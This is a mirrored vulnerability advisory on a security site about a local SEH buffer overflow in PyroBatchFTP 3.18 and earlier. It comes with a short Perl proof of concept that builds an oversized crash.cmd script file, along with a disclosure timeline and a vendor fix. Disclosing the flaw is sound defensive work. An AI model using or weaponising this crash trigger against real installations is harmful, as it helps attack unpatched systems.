首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PyroBatchFTP < 3.19 - Buffer Overflow 来源：advidsec (at) gmail (dot) com 作者：Cárdena 发布时间：2018-01-15   ============================================= MGC ALERT 2018-001 - Original release date: December 22, 2017 - Last revised:  January 12, 2018 - Discovered by: Manuel García Cárdenas - Severity: 7,5/10 (CVSS Base Score) =============================================   I. VULNERABILITY ------------------------- PyroBatchFTP <= 3.18 - Local Buffer Overflow (SEH)   II. BACKGROUND ------------------------- PyroBatchFTP is a Windows software that lets you exchange files with FTP, FTPS or SFTP servers in an automatic and unattended way, using a simple yet powerful batch/script language.   III. DESCRIPTION ------------------------- The Enterprise version of PyroBatchFTP is affected by a Local Buffer Overflow vulnerability.   The application does not check bounds when reading the file that will execute the script, resulting in a classic Buffer Overflow overwriting SEH handler.   To exploit the vulnerability only is needed create a local script to interact with the application.   IV. PROOF OF CONCEPT -------------------------   my $file= "crash.cmd"; my $junk= "A" x 2052; my $nseh = "BBBB"; my $seh = "CCCC"; open($FILE,">$file"); print $FILE $junk.$nseh.$seh; close($FILE); print "File Created successfully\n";   V. BUSINESS IMPACT ------------------------- Availability compromise can result from these attacks.   VI. SYSTEMS AFFECTED ------------------------- PyroBatchFTP <= 3.18   VII. SOLUTION ------------------------- Vendor release 3.19 version http://www.emtec.com/downloads/pyrobatchftp/pyrobatchftp319_changes.txt   VIII. REFERENCES ------------------------- https://www.emtec.com/pyrobatchftp/index.html   IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com).   X. REVISION HISTORY ------------------------- December 22, 2017 1: Initial release January 12, 2018 2: Revision to send to lists   XI. DISCLOSURE TIMELINE ------------------------- December 22, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas December 22, 2017 2: Send to vendor January 12, 2018 3: Vendor fix the vulnerability and release a new version January 12, 2018 4: Send to the Full-Disclosure lists   XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.   XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·ZyXEL P-660HW UDP Denial Of Se ·pfSense < 2.1.4 - 'status_rrd_ ·eBPF 4.9-stable Verifier Bug B ·SysGauge Server 3.6.18 - Buffe ·Disk Pulse Enterprise 10.1.18 ·Microsoft Edge Chakra - 'Appen ·Adminer 4.3.1 - Server-Side Re ·macOS - 'process_policy' Stack ·OBS studio 20.1.3 - Local Buff ·Microsoft Windows - NTFS Owner ·Synology Photo Station 6.8.2-3 ·Parity Browser < 1.6.10 - Bypa   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved